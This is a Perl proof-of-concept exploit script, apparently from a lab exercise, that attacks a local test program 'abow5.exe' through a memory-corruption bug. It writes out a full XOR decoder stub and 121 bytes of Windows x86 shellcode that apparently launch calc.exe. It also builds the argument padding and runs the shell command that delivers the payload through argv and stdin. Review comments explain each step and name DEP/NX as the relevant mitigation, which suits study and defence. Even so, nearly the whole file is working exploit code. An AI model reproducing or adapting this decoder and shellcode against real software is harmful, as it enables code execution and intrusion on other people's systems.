================== exploit.pl ==================

# Proof-of-concept driver for a local test binary (path in $abow5 below).
# It builds an XOR-encoded payload, passes it to the target as a command-line
# argument, and feeds a long string to the target's standard input.
# NOTE(review): the target program's source is not shown on this page, so the
# comments below describe only what this script itself constructs.

# 29-byte 32-bit x86 decoder stub. Read from the bytes: it XORs each byte that
# follows it with 0x90 ("\x80\x30\x90") and stops when it reaches the 4-byte
# marker compared by "\x81\x38\x4f\x4c\x4c\x41" (the same bytes as
# $endof_shellcode). These fixed byte sequences are static patterns a defender
# can match on.
$decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" .
       "\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff";

# 121-byte payload in clear form (8 lines of 14 bytes plus the 9-byte tail).
# It contains NUL bytes, which is presumably why it is XOR-encoded before being
# placed on a command line (TODO confirm).
$shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
  "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
  "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
  "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
  "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
  "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
  "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
  "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
  "\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";  # last 9 bytes are ASCII "calc.exe" + NUL

# XOR key: 121 bytes of 0x90, the same length as $shellcode. Perl's string ^
# works byte by byte, so every payload byte is XORed with 0x90.
$key = "\x90" x 121;
# End-of-payload marker ("OLLA" in ASCII) that the decoder stub looks for.
$endof_shellcode = "\x4f\x4c\x4c\x41";
# Replace the clear payload with its encoded form.
$shellcode = $shellcode ^ $key;
# 37 'A' characters, appended directly after "1025" in the first argument.
$prefix = "A" x 37;
# "A " repeated 0x1326 (4902) times. It is interpolated unquoted below, so the
# shell splits it into 4902 separate "A" arguments.
# NOTE(review): presumably this pads the argument area to a layout the target
# expects; confirm against the target.
$postfix = "A " x 0x1326;
# Hard-coded path to the target binary under a Cygwin home directory.
$abow5 = "c:/cygwin/home/Administrator/abow5/abow5.exe";
# 'x' binds tighter than '.', so this is 1024 bytes of "ABCD" followed by one
# 0x7f byte. It is sent to the target's stdin through echo.
$param = "ABCD" x 256 . "\x7f";
# Final argument value: decoder stub, then encoded payload, then end marker.
$shell_param = $decoder . $shellcode . $endof_shellcode;

# Backticks run the command line through the shell; the captured output is
# discarded (void context). Argument 1 is "1025" followed by $prefix, argument 2
# is the single-quoted payload, and the rest come from $postfix.
# NOTE(review): the payload is delivered as data in argv, so running it would
# need that memory to be executable; non-executable data memory (DEP/NX) is the
# relevant mitigation class. The target's build settings are not shown here.
`echo $param | exec $abow5 1025$prefix '$shell_param' $postfix`;